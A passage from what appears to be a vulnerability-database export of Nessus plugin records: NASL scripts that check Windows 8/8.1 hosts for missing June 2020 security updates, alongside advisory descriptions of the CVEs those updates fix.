or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561612',\n '4561674'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2', \n sp:0,\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561612, 4561674])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T09:55:14", "description": "The remote Windows host is missing security update 4561673\nor cumulative update 4561666. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. 
An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. 
An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1269)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. 
An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1334)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1263)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. 
An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. 
The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. 
An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)", "edition": 9, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-06-09T00:00:00", "title": "KB4561673: Windows 8.1 and Windows Server 2012 R2 June 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1253", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-0916", "CVE-2020-1220", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1311", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1216", "CVE-2020-1247", "CVE-2020-1246", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1196", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1270", "CVE-2020-1291", "CVE-2020-1260"], "modified": "2020-06-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561666.NASL", "href": "https://www.tenable.com/plugins/nessus/137262", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this 
plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137262);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/14\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1160\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1236\",\n \"CVE-2020-1239\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1260\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1272\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1287\",\n \"CVE-2020-1291\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1317\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561673\");\n script_xref(name:\"MSKB\", value:\"4561666\");\n script_xref(name:\"MSFT\", value:\"MS20-4561673\");\n script_xref(name:\"MSFT\", value:\"MS20-4561666\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0248-S\");\n\n script_name(english:\"KB4561673: Windows 8.1 and Windows Server 2012 R2 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561673\nor cumulative update 
4561666. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. 
(CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. 
(CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1269)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1334)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. 
An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1263)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. 
(CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. 
An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. 
(CVE-2020-1220)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4561673/windows-8-1-kb4561673\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4561666/windows-8-1-kb4561666\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4561673 or Cumulative Update KB4561666.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561666',\n '4561673'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3', \n sp:0,\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561666, 4561673])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T09:55:14", "description": "The remote Windows host is missing security update 4561649.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the 
vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1304,\n CVE-2020-1334)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. 
(CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. 
(CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1278)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. 
An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users 